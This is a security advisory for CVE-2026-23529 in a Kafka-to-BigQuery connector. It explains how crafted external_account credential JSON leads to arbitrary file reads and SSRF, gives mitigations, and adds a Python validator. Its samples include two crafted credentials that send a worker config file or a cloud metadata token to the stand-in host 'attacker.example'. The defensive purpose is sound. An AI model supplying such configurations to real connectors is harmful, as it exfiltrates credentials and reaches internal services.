CVE-2026-23529 in bigquery-connector-for-apache-kafka
Summary
by MITRE • 01/16/2026
Kafka Connect BigQuery Connector is an implementation of a sink connector from Apache Kafka to Google BigQuery. Prior to 2.11.0, there is an arbitrary file read in Google BigQuery Sink connector. Aiven's Google BigQuery Kafka Connect Sink connector requires Google Cloud credential configurations for authentication to BigQuery services. During connector configuration, users can supply credential JSON files that are processed by Google authentication libraries. The service fails to validate externally-sourced credential configurations before passing them to the authentication libraries. An attacker can exploit this by providing a malicious credential configuration containing crafted credential_source.file paths or credential_source.url endpoints, resulting in arbitrary file reads or SSRF attacks.
Analysis
by VulDB Data Team • 01/16/2026
CVE-2026-23529 is a security flaw in the Kafka Connect BigQuery Connector affecting versions prior to 2.11.0. The connector is a sink that streams records from Kafka topics into Google BigQuery tables and therefore needs Google Cloud credentials. Those credentials can be supplied as part of the connector configuration as a credential JSON document, which the connector hands to Google's authentication libraries. The flaw is that the connector performs no validation of that document before the authentication library acts on it, so anyone who can submit or modify a connector configuration (typically through the Kafka Connect REST API) can choose a credential type and credential source that make the library perform actions on the connector host on the attacker's behalf.
The mechanism is Google's support for external account (workload identity federation) credentials. A credential JSON of type external_account tells the library where to obtain a subject token and which token endpoint to exchange it at. With credential_source.file, the library reads the named file from the Kafka Connect worker's filesystem and sends its contents as the subject token to the configured token_url; if the attacker controls token_url, the contents of any file readable by the worker process (worker properties, mounted secrets, other keyfiles) are exfiltrated. With credential_source.url, the library performs an HTTP request from the connector host to an attacker-chosen endpoint, which is a server-side request forgery against internal services that the worker can reach but the attacker cannot. There is no validation step to bypass: the connector passes the document straight through, and the authentication library treats every field as operator-supplied. The two behaviours share one root cause, and a single crafted configuration can exercise either.
The operational impact is bounded by the privileges of the Connect worker process and the network position of its host, but within those bounds it is serious. An attacker who can read files as the worker can obtain database credentials, API keys and other keyfiles stored on or mounted into the host, and may then move laterally with them. The SSRF component lets the attacker reach services that are isolated from external access but reachable from the worker, including cloud instance metadata endpoints and internal management interfaces, and lets the worker host be used for internal reconnaissance. The precondition in every case is the ability to create or update a connector configuration, so deployments that expose the Kafka Connect REST API without authentication, or grant configuration rights broadly, are the most exposed. The weaknesses are CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) for the file read and CWE-918 (Server-Side Request Forgery) for the URL source. The ATT&CK techniques T1071.004 (Application Layer Protocol: DNS) and T1105 (Ingress Tool Transfer) are sometimes listed for this issue, but they describe command-and-control and tooling transfer rather than what this flaw provides; the behaviour it enables maps more directly to T1552.001 (Unsecured Credentials: Credentials In Files) and T1083 (File and Directory Discovery) for the file read, and T1046 (Network Service Discovery) for the SSRF.
Mitigation for CVE-2026-23529 starts with upgrading the connector to 2.11.0 or later, where the credential configuration is validated before it reaches the authentication library. Because the attack vector is the connector configuration itself, access to the Kafka Connect REST API should be authenticated and limited to the operators who legitimately deploy connectors. Where possible, supply Google credentials at the worker level rather than as inline JSON in individual connector configurations, and if inline credential JSON must be accepted, restrict it to service account keys rather than external account types, or at minimum reject credential_source.file and any URL that does not point at a Google STS endpoint. Run the worker under an account with the least privilege required for BigQuery, so that a file read gains little, and apply egress filtering so that the worker can reach BigQuery and the Google token endpoints but not arbitrary hosts or the instance metadata service. Finally, log and review connector configuration changes; an external_account credential appearing in a configuration submitted for this connector, or a credential whose token_url is not a Google host, is a signal worth alerting on.
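The following is an added example, not code from the Aiven connector or from Google's authentication libraries. It shows, in Python, the kind of pre-check described above: the credential JSON is parsed and classified before anything is handed to an auth library, and configurations that would cause a local file read, a request to an arbitrary URL, or a command execution are rejected. The two crafted credential documents and the benign one are constructed for this example; the function names, the ALLOWED_HOSTS allowlist and the policy of accepting only service_account and authorized_user types by default are assumptions made here, not behaviour of the fixed connector.

```python
import json
from urllib.parse import urlparse

# Credential types whose only effect is a token exchange with fixed Google endpoints.
SAFE_TYPES = {"service_account", "authorized_user"}

# Hosts an external_account credential may legitimately contact.
# Assumed allowlist for this example; deployments that use url-sourced
# federation from a metadata endpoint must opt that host in explicitly.
ALLOWED_HOSTS = {"sts.googleapis.com", "iamcredentials.googleapis.com"}


def _check_url(url, field):
    """Return an error string if `url` is not an https URL to an allowed host."""
    if not isinstance(url, str):
        return f"{field} is not a string"
    p = urlparse(url)
    if p.scheme != "https" or p.hostname not in ALLOWED_HOSTS:
        return f"{field} points at {url!r}, outside the allowed Google endpoints"
    return None


def _validate(cred):
    if not isinstance(cred, dict):
        return False, "credential must be a JSON object"
    ctype = cred.get("type")
    if ctype in SAFE_TYPES:
        return True, f"{ctype} credential accepted"
    if ctype == "impersonated_service_account":
        # Wraps another credential document; apply the same rules to the inner one.
        ok, reason = _validate(cred.get("source_credentials"))
        return ok, f"impersonated_service_account -> {reason}"
    if ctype != "external_account":
        return False, f"unsupported credential type {ctype!r}"

    src = cred.get("credential_source")
    if not isinstance(src, dict):
        return False, "external_account without a credential_source object"
    # A file source makes the library read that path and send its contents
    # to token_url as the subject token: the arbitrary file read in the advisory.
    if "file" in src:
        return False, f"credential_source.file would read {src['file']!r} from the connector host"
    # An executable source runs a command on the host to obtain the token.
    if "executable" in src:
        return False, "credential_source.executable would run a command on the connector host"
    # Every URL the library would fetch must be a Google endpoint over https.
    for field in ("url", "region_url", "imdsv2_session_token_url"):
        if field in src:
            err = _check_url(src[field], f"credential_source.{field}")
            if err:
                return False, err
    for field in ("token_url", "service_account_impersonation_url", "token_info_url"):
        if field in cred:
            err = _check_url(cred[field], field)
            if err:
                return False, err
    return True, "external_account credential accepted"


def validate_credential_json(text):
    """Classify a credential JSON before it reaches an auth library.

    Returns (ok, reason). Anything that would make the library read a local
    file, run a command, or talk to a non-Google host is rejected.
    """
    try:
        cred = json.loads(text)
    except ValueError as e:
        return False, f"not valid JSON: {e}"
    return _validate(cred)


# Constructed samples. token_url is attacker-controlled in both crafted documents,
# so whatever the library obtains as a subject token would be posted there.
CRAFTED_FILE_READ = json.dumps({
    "type": "external_account",
    "audience": "//iam.googleapis.com/projects/0/locations/global/workloadIdentityPools/p/providers/x",
    "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
    "token_url": "https://attacker.example/sts",
    "credential_source": {"file": "/etc/kafka/connect-distributed.properties"},
})

CRAFTED_SSRF = json.dumps({
    "type": "external_account",
    "audience": "//iam.googleapis.com/projects/0/locations/global/workloadIdentityPools/p/providers/x",
    "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
    "token_url": "https://attacker.example/sts",
    "credential_source": {"url": "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"},
})

BENIGN_SERVICE_ACCOUNT = json.dumps({
    "type": "service_account",
    "project_id": "example-project",
    "client_email": "sink@example-project.iam.gserviceaccount.com",
    "private_key": "-----BEGIN PRIVATE KEY-----\nplaceholder\n-----END PRIVATE KEY-----\n",
})

if __name__ == "__main__":
    for name, doc in (("file read", CRAFTED_FILE_READ), ("ssrf", CRAFTED_SSRF), ("benign", BENIGN_SERVICE_ACCOUNT)):
        print(name, validate_credential_json(doc))
```

The check runs before the document is passed to any authentication library, which is the point: the library's own handling of credential_source is by design, so the decision about which sources are acceptable has to be made by the component that accepts configuration from users. Wrapped credentials are unwrapped and checked with the same rules so that an impersonated_service_account envelope cannot smuggle an external_account inside it.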